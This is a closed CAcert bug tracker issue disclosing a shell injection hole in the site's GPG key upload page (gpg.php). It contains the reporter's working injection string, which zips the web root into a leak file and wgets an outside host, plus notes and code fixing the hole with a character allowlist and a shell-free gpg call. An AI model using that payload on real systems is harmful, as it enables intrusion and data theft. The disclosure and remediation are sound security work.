View Issue Details
Field | Value
---|---
ID | 0000245
Project | Main CAcert Website
Category | GPG/PGP
View Status | public
Date Submitted | 2006-05-28 21:15
Last Update | 2013-11-20 22:23
Reporter | TheSourcerer
Assigned To |
Priority | normal
Severity | block
Reproducibility | always
Status | closed
Resolution | fixed
Fixed in Version | 2006
Summary | 0000245: Shell escape
Description | The following GPG keys can be used to exploit a hole in the system: `"; echo "Hi" >/tmp/test ; echo " "; zip -r /www/www/leak.zip /www ; echo " " ; wget http://www2.futureware.at/HoleInOne ; echo "` results in the following request: `72.36.210.246 - - [28/May/2006:00:29:34 +0200] "GET /HoleInOne HTTP/1.0" 404 1051 "-" "Wget/1.10.2"` The hole is in www/gpg.php line 45.
Tags | No tags attached.
Reviewed by |
Test Instructions |
Relationship | Issue | Status | Summary
---|---|---|---
related to | 0000148 | closed | site shouldn't rely on magic_quotes_gpc turned on

This exploit was not possible some weeks ago. Updating PHP might have introduced configuration changes. Seems to me as if magic_quotes_gpc has been turned off (that's the Debian default) or magic_quotes_sybase has been turned on as well (which would break the functionality of magic_quotes_gpc). Possible solution:

1. turn on magic_quotes_gpc in the PHP configuration
2. make sure magic_quotes_sybase is turned off
3. add something like `function check_quotes($value) { return ((!get_magic_quotes_gpc()) ? addslashes($value) : $value); }`
Line 44 actually...

    - $gpgkey = $_POST['CSR'];
    + $gpgkey = escapeshellarg($_POST['CSR']);
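Review bot: the `+` line still builds a shell command string from user input; escapeshellarg() wraps the whole value in single quotes, and with magic_quotes_gpc on (the condition the previous note depends on) $_POST['CSR'] still carries the backslashes PHP added, so stripslashes() belongs before the escaping and the escaped value must be inserted as exactly one argument of the command on line 44, which this hunk does not show. The safer change is to stop passing the key through a shell at all and hand it to gpg on stdin or via a temporary file, with an allowlist on the key's characters as a second layer.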
escapeshellarg breaks GPG keys; instead a new function was created to only allow base64 chars...

    function clean_csr($CSR) { return(preg_replace("/[^A-Za-z0-9\n\r\-\:\=\+\/ ]/","",$CSR)); }
    $gpgkey = clean_csr(stripslashes($_REQUEST['CSR']));
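As an added example (not CAcert's gpg.php, whose surrounding command the ticket does not show), the allowlist from the last note applied to the string from the report and to a constructed armor block, together with a read of the parameter that does not depend on the magic_quotes_gpc setting and a gpg call that never goes through a shell; the gpg home directory path is assumed.

```php
<?php
// Added example, not code from CAcert's gpg.php: the allowlist from the note
// above, applied to the report's string and to a constructed armor block,
// plus a magic_quotes-independent read and a shell-free call to gpg.

// Same character class as the fix: base64 alphabet, armor punctuation
// (- : = + /), space, CR and LF. Quotes, ';', '>', '$' and backticks are
// dropped, so nothing a shell treats as syntax survives.
function clean_csr(string $csr): string
{
    return preg_replace("/[^A-Za-z0-9\n\r\-\:\=\+\/ ]/", "", $csr) ?? '';
}

// Undo magic_quotes_gpc escaping only when it is actually on, rather than
// relying on php.ini (the note's fix calls stripslashes unconditionally).
// get_magic_quotes_gpc() no longer exists on PHP 8, hence the guard.
function read_csr(array $request): string
{
    $raw = $request['CSR'] ?? '';
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $raw = stripslashes($raw);
    }
    return clean_csr($raw);
}
// Feed the key to gpg on stdin with an argv array (PHP >= 7.4), so no shell
// parses user input and the allowlist only has to guard the key format.
// $gpgHome is an assumed path; returns gpg's exit status.
function import_key(string $key, string $gpgHome): int
{
    $spec = [['pipe', 'r'], ['pipe', 'w'], ['pipe', 'w']];
    $cmd  = ['gpg', '--homedir', $gpgHome, '--batch', '--import'];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        return -1;
    }
    fwrite($pipes[0], $key);
    fclose($pipes[0]);
    // Drain stdout/stderr so gpg cannot block on a full pipe before exiting.
    stream_get_contents($pipes[1]);
    stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc);
}

// Constructed inputs: the start of the report's string and a stub armor block.
$payload = "\"; echo \"Hi\" >/tmp/test ; echo \"";
$armor   = "-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: GnuPG v1.4.2\n\n"
         . "mQGiBEQ5fqYRBAC=\n=AbCd\n-----END PGP PUBLIC KEY BLOCK-----\n";
var_dump(clean_csr($payload) === " echo Hi /tmp/test  echo ");
var_dump(clean_csr($armor) === str_replace("1.4.2", "142", $armor));
```

The second check shows the one side effect of the allowlist on a real key: the dots in the `Version:` armor header are removed, which gpg ignores, while the base64 body, the CRC line and the BEGIN/END lines pass through unchanged.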
Date Modified | Username | Field | Change |
---|---|---|---|
2006-05-28 21:15 | TheSourcerer | New Issue | |
2006-05-28 21:51 | | Relationship added | related to 0000148 |
2006-05-28 22:06 | | Note Added: 0000234 | |
2006-05-28 23:13 | duane | Note Added: 0000235 | |
2006-05-28 23:55 | duane | Note Added: 0000236 | |
2006-05-28 23:56 | duane | Status | new => closed |
2006-05-28 23:56 | duane | Resolution | open => fixed |
2006-05-28 23:56 | duane | Fixed in Version | => production |
2006-05-29 00:03 | duane | Note Edited: 0000236 | |
2013-01-14 08:46 | Werner Dworak | Fixed in Version | => 2006 |
2013-11-20 22:23 | NEOatNHNG | View Status | private => public |